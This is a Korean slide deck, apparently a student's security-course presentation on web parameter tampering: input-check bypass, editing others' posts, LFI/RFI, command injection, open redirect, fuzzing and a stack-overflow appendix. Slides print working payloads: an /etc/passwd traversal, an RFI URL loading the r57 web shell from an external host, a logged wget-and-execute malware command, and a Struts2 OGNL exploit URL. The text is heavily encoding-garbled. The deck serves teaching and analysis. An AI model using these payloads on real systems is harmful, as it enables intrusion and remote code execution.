Abstract image of a woman sitting on books and studying on a laptop

parameter tampering

I
Ilsun Choi

parameter tampering

Technology
1 of 49
Downloaded 17 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
ํŒŒ๋ผ๋ฏธํ„ฐ ๋ณ€์กฐ ์ทจ์•ฝ์  9์ฃผ์ฐจ ํŒŒ๋ผ๋ฏธํ„ฐ ๋ณ€์กฐ ์ทจ์•ฝ์  ์ตœ์ผ์„  1E-mail: isc0304@naver.com Writing by Ilsun Choi
Index 1. ๊ฐœ์š” 2. ์‚ฌ๋ก€๋ถ„์„ 1) ํšŒ์›๊ฐ€์ž… 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œํ•˜๊ธฐ 3) ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ๋กœ ๊ตฌ์„ฑ๋œ ์ˆ˜์ •/์‚ญ์ œํŽ˜์ด์ง€ ์ •๋ณด ๋…ธ์ถœ 4) ํŒŒ์ผ ์‚ฝ์ž…(LFI/RFI) 5) ๋ช…๋ น์–ด ์‚ฝ์ž… 6) URL Redirection 3. ๋ชจ์˜์‹ค์Šต 1) ๋ช…๋ น์–ด ์‚ฝ์ž… ์ทจ์•ฝ์  ํƒ์ง€ 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€ ๋ถ€๋ก. Direct RET BOF 2E-mail: isc0304@naver.com Writing by Ilsun Choi
1. ๊ฐœ์š” 3 ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜์—์„œ ์‚ฌ์šฉ๋˜๋Š” ์ •๋ณด ์‚ฌ์šฉ์ž ์ž…๋ ฅํผ Query String HTTP ํ—ค๋” ๊ธฐํƒ€ ๋ช…๋ น์–ด ์‚ฝ์ž… ์›๊ฒฉ์ง€ ํŒŒ์ผ ์‚ฝ์ž… ํƒ€์ธ๊ธ€ ์ˆ˜์ •/์‚ญ์ œ ๋ณ€์กฐ E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ 1) ํšŒ์›๊ฐ€์ž… 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œํ•˜๊ธฐ 3) ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ๋กœ ๊ตฌ์„ฑ๋œ ์ˆ˜์ •/์‚ญ์ œํŽ˜์ด์ง€ ์ •๋ณด ๋…ธ์ถœ 4) ํŒŒ์ผ ์‚ฝ์ž…(LFI/RFI) 5) ๋ช…๋ น์–ด ์‚ฝ์ž… 6) URL Redirection 4E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž… โ€ข ์ž…๋ ฅ ๊ฐ’ ๊ฒ€์ฆ์„ ์œ„ํ•œ ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ โ€ข ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ์˜ ์˜ˆ โ€ข ๋น„๊ณต๊ฐœ test site๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‹ค์Šตํ•œ ๋‚ด์šฉ์„ ์ •๋ฆฌํ•˜์˜€๋‹ค. 5 if ( a!= b ){ alert(โ€œno hackโ€); location.href = โ€œ/โ€; } E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž… 1) ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ ์ธ์ฆ ์šฐํšŒ 6E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ ์ฒดํฌ ๋กœ์ง์„ ์ฐพ์•„ ์‚ญ์ œ 2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž… 7E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ์กด์žฌํ•˜์ง€ ์•Š๋Š” ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ๋ฅผ ๊ธฐ์ž…ํ•˜์—ฌ ์šฐํšŒ์— ์„ฑ๊ณต 2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž… 8E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž… โ€ข ์ฃผ์†Œ์ฐพ๊ธฐ ์„œ๋น„์Šค ์šฐํšŒ โ€ข ํ…Œ์ŠคํŠธ ์„œ๋ฒ„์ด๊ธฐ ๋•Œ๋ฌธ์— ์ฃผ์†Œ์ฐพ๊ธฐ ์„œ๋น„ ์Šค๊ฐ€ ์กด์žฌํ•˜์ง€ ์•Š๋Š”๋‹ค. 9E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ์„ฑ๊ณต์ ์œผ๋กœ ํšŒ์›๊ฐ€์ž…์— ์„ฑ๊ณตํ•œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค. 10 2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž… E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œ 7.1.1 ํƒ€์ธ ๋น„๋ฐ€ ๊ธ€ ๋ณด๊ธฐ์™€ ์œ ์‚ฌ ๋จผ์ € ์šฐ๋ฆฌ๊ฐ€ ์ด์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒŒ์‹œ๋ฌผ ์ƒ์„ฑ 11E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ๋‚ด๊ฐ€ ์“ด ๊ธ€ ์ˆ˜์ • ํŽ˜์ด์ง€ ์—ด๊ธฐ 12 2. ์‚ฌ๋ก€๋ถ„์„ > 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œ E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ํŽ˜์ด์ง€ ์š”์ฒญ์—์„œ 18๋ฒˆ ๊ฒŒ ์‹œ๊ธ€ ๋ณ€๊ฒฝ์„ ์š”์ฒญํ•˜๊ณ  ์žˆ๋‹ค ๋Š” ๊ฒƒ์„ ํ™•์ธ โ€ข 15๋ฒˆ ๊ฒŒ์‹œ๊ธ€์„ ๋ฐ”๊พธ๊ธฐ ์œ„ ํ•ด ๋ณ€์กฐํ•˜์—ฌ ์ง„ํ–‰ 13 2. ์‚ฌ๋ก€๋ถ„์„ > 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œ E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ์ˆ˜์ • ํ›„ โ€ข ์‚ญ์ œ ํ›„ 14 2. ์‚ฌ๋ก€๋ถ„์„ > ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œ E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 3) ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ, ์ˆ˜์ • ์‚ญ์ œ ํŽ˜์ด์ง€ ๋…ธ์ถœ 15 โ€ข ์‚ญ์ œ๊ฑฐ๋‚˜ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ๋Š” ํŽ˜์ด์ง€๋ฅผ ์š”์ฒญํ•˜๋Š” ํ˜•์‹ โ€ข javascript ๋‚ด์— ์ˆ˜์ •/์‚ญ์ œ ํŽ˜์ด์ง€ ํ™•์ธ ๊ฐ€๋Šฅ E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI) โ€ข RFI: Remote File Inclusion ์™ธ๋ถ€์— ์žˆ๋Š” ์„œ๋ฒ„๋กœ๋ถ€ํ„ฐ ํŒŒ์ผ์„ ์ฒจ๋ถ€ ๋ฐ›์Œ -> ์ทจ์•ฝํ•œ ๋กœ์ง(์›น์‰˜๊ณผ ๊ฐ™์€)์„ ๊ฐ€์ ธ์˜ค๊ธฐ ์œ„ํ•จ โ€ข LFI: Local File Inclusion ์„œ๋ฒ„๋‚ด๋ถ€๋กœ๋ถ€ํ„ฐ ํŒŒ์ผ์„ ์ฒจ๋ถ€ ๋ฐ›์Œ -> ๋ฏผ๊ฐํ•œ ๋ฐ์ดํ„ฐ ๋…ธ์ถœ(์‹œ์Šคํ…œ ํŒŒ์ผ ๋“ฑ)์„ ์œ„ํ•จ 16E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข Default๋Š” Off โ€ข ๊ฐœ๋ฐœ์ž์˜ ํ•„์š”์— ์˜ํ•ด์„œ On์ด ๋  ์ˆ˜ ์žˆ์Œ. 17E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
LFI ์‚ฌ๋ก€ 1 โ€ข ํŒŒ๋ผ๋ฏธํ„ฐ ๊ฐ’์— ์‹œ์Šคํ…œ ํŒŒ์ผ ๋“ฑ์˜ ๊ฒฝ๋กœ๋ฅผ ์‚ฝ์ž… (๋‹ค์šด๋กœ๋“œ ์ทจ์•ฝ์ ๊ณผ ์œ ์‚ฌ) โ€ข ์•„๋ž˜์™€ ๊ฐ™์€ ํ™•์žฅ์ž๋ฅผ ๋ถ™์ด๋Š” ํ˜•์‹ ๏ƒ  ๋„๋ฐ”์ดํŠธ ์ธ์ ์…˜์„ ์‚ฌ์šฉ 18 ๊ตฌ๋ถ„ ํŒŒ๋ผ๋ฏธํ„ฐ ์›๋ณธ file=php(๋‚ด๋ถ€์ ์œผ๋กœ .abc๊ฐ€ ๋ถ™์–ด, php.abc๋ฅผ ํ˜ธ์ถœ ๋ณ€์กฐ file=../../../../../../etc/passwd%00 ๊ตฌ๋ถ„ ์ทจ์•ฝํ•œ ํ•จ์ˆ˜ php์–ธ์–ด require(),include(),eval(),passthru(),system(),fopen() ๋“ฑ E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
LFI ์‚ฌ๋ก€ 2 โ€ข ์ œ๋กœ๋ณด๋“œ(xe)์˜ /include/write.php ์—์„œ ๋ฐœ์ƒ๋œ LFI ์ทจ์•ฝ์  โ€ข โ€œ://โ€ ์™€ โ€œ..โ€ ๋งŒ์„ ํ•„ํ„ฐ๋งํ•˜๊ธฐ ๋•Œ๋ฌธ์— ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๊ฒฝ๋กœ๋Š” ์‚ฝ์ž… ๊ฐ€๋Šฅ c:windowssystem32driveretchosts 19E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
RFI ์‚ฌ๋ก€ 1 โ€ข ์›๊ฒฉ์ง€์— ์žˆ๋Š” txtํŒŒ์ผ ๏ƒ  ์„œ๋ฒ„ ๋‚ด๋ถ€์—์„œ php๋กœ ์‹คํ–‰ 1. null.php ์‹คํ–‰ 2. include๋กœ test.txt ํŒŒ์ผ ์ฝ”๋“œ๋ฅผ ๋ถˆ๋Ÿฌ์˜ด 3. null.php๊ฐ€ ๋ถˆ๋Ÿฌ์˜จ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ 20 ์‹คํ–‰์ˆœ์„œ 1. 2. 3. E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
โ€ข ์‰˜ ์ฝ”๋“œ ์ฃผ์†Œ โ€ข http://www.r57shell.net/shell/r57.txt 21E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
โ€ข http://192.168.157.130/9ch/null.php?file=http:// www.r57shell.net/shell/r57.txt %00 โ€ข ์ด์ „ ์‚ฌ๋ก€์™€ ๋™์ผํ•œ ๋ฐฉ์‹์œผ๋กœ txt ํŒŒ์ผ์„ ๋ถˆ๋Ÿฌ๋“ค ์—ฌ ์‹คํ–‰ํ•จ. 22E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
23 RFI ์‚ฌ๋ก€ 2 โ€ข โ€œ://โ€์„ ํ•„ํ„ฐ๋งํ•˜์—ฌ ์‚ฌ๋ก€(1)๊ณผ ๊ฐ™์€ ์ทจ์•ฝ์ ์„ ๋ฐœ์ƒํ•˜์ง€ ์•Š๋Š”๋‹ค. โ€ข ๊ทธ๋Ÿฌ๋‚˜, base64๋กœ ์ธ์ฝ”๋”ฉ๋œ phpinfo()์„ ์‚ฝ์ž…ํ•˜๋ฉด php.ini ํŒŒ์ผ ์ •๋ณด๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. ๏ƒ  ์ถ”๊ฐ€์ ์ธ ์ทจ์•ฝ์  ๋…ธ์ถœ ๊ฐ€๋Šฅ์„ฑ E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
โ€ข http://192.168.157.130/9ch/null.php?file=data:;base64,PD9waHBpbmZvKCk/PiUwMA== โ€ข ์‚ฝ์ž…๋œ base64 ์ฝ”๋“œ : <?phpinfo()?>%00 24E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
25 โ€ข ์ทจ์•ฝํ•  ์ˆ˜ ์žˆ๋Š” php.ini ์„ค์ • ๋ชฉ๋ก โ€ป ์ž์„ธํ•œ ๋‚ด์šฉ์€ ๊ต์žฌ p288 ํ™•์ธํ•˜๋ฉด ๋œ๋‹ค. ์„ค์ •์ •๋ณด ๊ถŒ์žฅ ๊ฐ’ ์„ค์ •์ •๋ณด ๊ถŒ์žฅ ๊ฐ’ register_globals Off magic_quotes_sybase Off safe_mode On open_basedir ๋””๋ ‰ํ„ฐ๋ฆฌ safe_mode_gid Off safe_mode_exec_dir ๋””๋ ‰ํ„ฐ๋ฆฌ expose_php Off display_errors Off file_uploads Off log_errors On allow_url_fopen Off error_log ํŒŒ์ผ๋ช… magic_quotes_gpc On E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž… 1) PHP exec ํ•จ์ˆ˜ ๋ง˜๋ณด(Mambo) ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  26 mkidr E-mail: isc0304@naver.com Writing by Ilsun Choi
2) open() ํ•จ์ˆ˜ AWStats ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ awstats.pl ํŽ˜์ด์ง€ ์ทจ์•ฝ์  ๊ณต๊ฒฉ ๋กœ๊ทธ 1. id ๋ช…๋ น์–ด๋กœ ๊ณ„์ •๊ถŒํ•œ ํ™•์ธ 2. ์›๊ฒฉ์ง€ ํŒŒ์ผ(aw.tgz)๋ฅผ ๊ฐ€์ ธ์™€ ์•…์„ฑํ”„๋กœ๊ทธ๋žจ ์‹คํ–‰(inetd) 27 1 66.99.250.98 - - [24/Feb/2005:02:20:45 -0500] โ€œGET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1โ€404 1051 โ€œ-โ€ โ€œmozilla./4.0 (compatible; MSIE 6.0; Windows 98)โ€ 2 213.135.2.227 - - [26/Feb/2005:14:13:38 -0500] โ€œGET /cgibin/awstats.pl? configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.shady.go.ro%2faw.tgz%3b%20tar%20zx... HTTP1.1โ€200 410 โ€œ-โ€ โ€œMozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)โ€ 2๋ฒˆ ๋‚ด์šฉ ๋””์ฝ”๋”ฉ configdir= | cd /tmp; wget www.shandy.go.ro/aw.tgz; tar zxf aw.tgz; rm โ€“f aw.tgz; cd aw; ./inetd | E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
3) Apache Struts2(์ž๋ฐ” ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๊ฐœ๋ฐœ ํ”„๋ ˆ์ž„ ์›Œํฌ) ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰ โ€ข http://seclists.org/fulldisclosure/2013/Oct/96 โ€ข โ€œaction:โ€, โ€œredirection:โ€, redirectAction:โ€๊ณผ ๊ฐ™์€ ํŒŒ๋ผ๋ฏธํ„ฐ์— ํŠน์ • ๊ตฌ๋ฌธ ์ „๋‹ฌ 28 http://vmbuild.apache.org/continuum/groupSummary.action?redirect:${%23a%3d(ne w%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d% 23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dne w%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),% 23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRespon se'),%23matr%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletR equest'),%23matt.getWriter().println(%23matr.getRealPath(%22/%22)),%23matt.getWri ter().flush(),%23matt.getWriter().close()} E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
4) ASP ์‰˜ ์ฝ”๋“œ 5) PHP ์‰˜ ์ฝ”๋“œ 29E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
5) JSP ์‰˜ ์ฝ”๋“œ 30E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
์–ธ์–ด๋ณ„ ์ทจ์•ฝํ•œ ํ•จ์ˆ˜ : ์•„๋ž˜ ํ•จ์ˆ˜ ์‚ฌ์šฉ์‹œ ์ฃผ์˜๊ฐ€ ํ•„์š”ํ•จ 31 ๊ตฌ๋ถ„ ์ทจ์•ฝํ•œ ํ•จ์ˆ˜ PHP require(), include(), eval(), exec(), passthru(), system(), fopen ๋“ฑ PERL open(), sysopen(), glob(), system() ๋“ฑ JAVA system.* (system.runtime) ๋“ฑ C system(), exec(), strcpy(), strcat(), sprint() ๋“ฑ PYTHON exec(), eval(), execfile(), compile(), input() ๋“ฑ E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
โ€ข ํŒŒ๋ผ๋ฏธํ„ฐ๋กœ ๋ฐ›์€ URL ์ฃผ์†Œ๋กœ ํŽ˜์ด์ง€ ์ด๋™ โ€ข ํ”ผ์‹ฑ ์œ„ํ—˜ โ€ข ํ˜•ํƒœ http://์‹ ๋ขฐํ• ์ˆ˜์žˆ๋Š”์‚ฌ์ดํŠธ/redirect.asp?target=http://malicious.com Phishing์ด๋ž€? Private Data + fishing์˜ ํ•ฉ์„ฑ์–ด ์ด๋ฉ”์ผ ๋˜๋Š” ์ŠคํŒธ ๋“ฑ์„ ๋ฐœ์†ก ๋ฐ ์ ‘์†์ž๋“ค์„ ํŠน์ • ์‚ฌ์ดํŠธ์™€ ๋™์ผํ•œ ๊ฐ€์งœ ์‚ฌ์ดํŠธ๋กœ ์ ‘์† ๏ƒ  ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ, ์€ํ–‰ ๊ณ„์ขŒ ํ˜น์€ ์‹ ์šฉ์นด๋“œ ๋ฒˆํ˜ธ ํƒˆ์ทจ Phishing์˜ ์œ ๋ž˜ 1996๋…„ AOL(American Online)์„ ์‚ฌ์šฉํ•˜๋˜ 10๋Œ€๋“ค์ด ์ผ๋ฐ˜ ์‚ฌ์šฉ์ž์—๊ฒŒ ๊ฐ€์งœ ์ด๋ฉ”์ผ์„ ๋ณด๋‚ด๋Š” ํ•ดํ‚น ๊ธฐ ๋ฒ•์œผ๋กœ ์œ ๋ž˜๋จ. 32E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
โ€ข ๋ณด์•ˆ ๋‰ด์Šค ์ฐธ๊ณ  ๊ธฐ์‚ฌ : http://www.boannews.com/media/view.asp?idx=45812 โ€ข ์Œ๋ž€ ๋™์˜์ƒ ํด๋ฆญ ์‹œ ํ”ผ์‹ฑ ์„œ๋ฒ„๋กœ ์ด๋™ โ€ข ํŽ˜์ด์Šค๋ถ๊ณผ ๋˜‘๊ฐ™์ด ์ƒ๊ธด UI๋กœ ID/Password ์š”์ฒญ 33ํŽ˜์ด์Šค๋ถ ๊ณ„์ • ํƒˆ์ทจ ๋ฐฉ๋ฒ• ๊ฐœ๋…๋„(์ถœ์ฒ˜: ์ด์ŠคํŠธ์†Œํ”„ํŠธ) โ–ฒE-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 6) URL Redirection
3. ๋ชจ์˜์‹ค์Šต 1) ๋ช…๋ น์–ด ์‚ฝ์ž… ์ทจ์•ฝ์  ํƒ์ง€ 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€ 34E-mail: isc0304@naver.com Writing by Ilsun Choi
3. ๋ชจ์˜์‹ค์Šต > 1) ๋ช…๋ น์–ด ์‚ฝ์ž… ์ทจ์•ฝ์  ํƒ์ง€ โ€ข ํŒŒ๋ผ๋ฏธํ„ฐ ๋’ค์— ๋ช…๋ น์–ด ์‚ฝ์ž… ์‹œ ๋ช…๋ น์–ด๊ฐ€ ์‹คํ–‰๋˜๋Š” ์ทจ์•ฝ์ ์„ ํƒ์ง€ํ•œ๋‹ค. โ€ข ์‚ฝ์ž… ํŒจํ„ด : &ipconfig โ€ข ํƒ์ง€ ํŒจํ„ด : 255.255.25 โ€ข ์ž‘์„ฑํ•œ ํƒ์ง€ ํŒจํ„ด 35E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ํƒ์ง€ ๊ฒฐ๊ณผ โ€ข ์„œ๋ฒ„์—์„œ netmask๋ฅผ 255.255.254๋กœ ๋ฐ”๊พผ ๊ฒƒ์œผ๋กœ ๋ณด์ž„ 36E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์˜์‹ค์Šต > 1) ๋ช…๋ น์–ด ์‚ฝ์ž… ์ทจ์•ฝ์  ํƒ์ง€
http://cafe.naver.com/sec/13325 1. Savant โ€ข BOF ์ทจ์•ฝ์ ์ด ์กด์žฌํ•˜๋Š” ์„œ๋ฒ„ 2. Taof โ€ข ์›น ์„œ๋ฒ„ fuzzer 3. ์‹œ์—ฐ ๋™์˜์ƒ 37E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
โ€ข ํ”„๋ก์‹œ ์„œ๋ฒ„๋ฅผ ์ƒ์„ฑํ•˜์—ฌ ์›น๋ธŒ๋ผ์šฐ์ €๋กœ ์ ‘์† ์‹œ ์š”์ฒญ ํŒจํ‚ท์„ ๊ธฐ๋ก 38E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
โ€ข Fuzzing Points๋ฅผ ์„ค์ •ํ•˜์—ฌ Test ํ•  ๋ฌธ์ž์—ด ๊ธธ์ด๋ฅผ ์ •ํ•จ โ€ข Savant ํ”„๋กœ๊ทธ๋žจ์„ Attachํ•˜์—ฌ ๋น„์ •์ƒ ์ข…๋ฃŒ ์‹œ ํ”„๋กœ๊ทธ๋žจ ๋คํ”„๋ฅผ ์ถ”์ถœ 39E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
โ€ข ํ”„๋กœ๊ทธ๋žจ์ด ์ข…๋ฃŒ ์‹œ ์ถ”์ถœ๋œ ๋คํ”„ 40E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
41 โ€ข Taof debugging data โ€ข toaf fuzzer๋Š” BOF ์ ๊ฒ€ ์‹œ A๋ฅผ ์‚ฌ์šฉ โ€ข 240 ๋ฌธ์ž์—ด ์‚ฝ์ž… ์ด์ „ ๊ฒฐ๊ณผ ๏ƒ File not found โ€ข 255 ๋ฌธ์ž์—ด ์‚ฝ์ž… ์ดํ›„ ๊ฒฐ๊ณผ ๏ƒ Exception ๋ฐœ์ƒ E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
๋ถ€๋ก. Direct RET BoF ๏ถ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ํ™˜๊ฒฝ์—๋งŒ ๊ฐ€๋Šฅํ•œ ๊ธฐ๋ฒ•์ด๋‹ค. - Windows XP ๊ธ‰ ๊ธฐ๋ฐ˜(ASLR ๊ธฐ๋ฐ˜ OS๋Š” ์‹คํ–‰ํ•˜๊ธฐ ์–ด๋ ค์›€) - GS-Cookie ๋ฏธ์„ค์ • - DEP ๋ฏธ์„ค์ • ๏ถ ์ด๋ฏธ์ง€๋Š” ์•„๋ž˜ ๋ธ”๋กœ๊ทธ๋ฅผ ์ฐธ๊ณ ํ•˜์˜€๋‹ค. http://fehead.tistory.com/201 42E-mail: isc0304@naver.com Writing by Ilsun Choi
43 โ€ข main() ํ•จ์ˆ˜์—์„œ A() ํ•จ์ˆ˜ ํ˜ธ์ถœ ์‹œ ์Šคํƒ ๋ณ€ํ™” E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ€๋ก. Direct RET BoF
โ€ข 98๋ฒˆ ์ฃผ์†Œ์— main()์—์„œ์˜ EIP ์ €์žฅ 44E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ€๋ก. Direct RET BoF
โ€ข 97๋ฒˆ ์ฃผ์†Œ์— main()์—์„œ์˜ EBP ์ €์žฅ 45E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ€๋ก. Direct RET BoF
โ€ข A() ํ•จ์ˆ˜ ์Šคํƒ ์ƒ์„ฑ 46E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ€๋ก. Direct RET BoF
โ€ข C/C++ ๋“ฑ์—์„œ์˜ ๋ฌธ์ž์—ด ์ €์žฅ๋ฐฉ์‹ ๏ƒ  ์•ž ์ฃผ์†Œ ์ง€์ • ๏ƒ  null์ด ๋“ฑ์žฅํ•  ๋•Œ๊นŒ์ง€ ์ฑ„์›€ 47 ๋ฌธ์ž์—ด ์ž…๋ ฅ ๋ฌธ์ž์—ด์„์ฑ„์šฐ๋Š”๋ฐฉํ–ฅ RET ๋ณ€์กฐ ์œ„ํ—˜ E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ€๋ก. Direct RET BoF
48 ์‰˜ ์ฝ”๋“œ ์ž…๋ ฅ ๋ณ€์กฐ๋œ RET โ€ข RET๊ฐ€ ์‰˜ ์ฝ”๋“œ๋ฅผ ๊ฐ€๋ฆฌํ‚ด ๏ƒ  ์‰˜ ์ฝ”๋“œ ์‹คํ–‰ โ€ข RET(EIP)์™€ EBP์— โ€œ41414141โ€์ด ์ž…๋ ฅ๋จ ๏ƒ ๋ณ€์กฐ ๊ฐ€๋Šฅ E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ€๋ก. Direct RET BoF
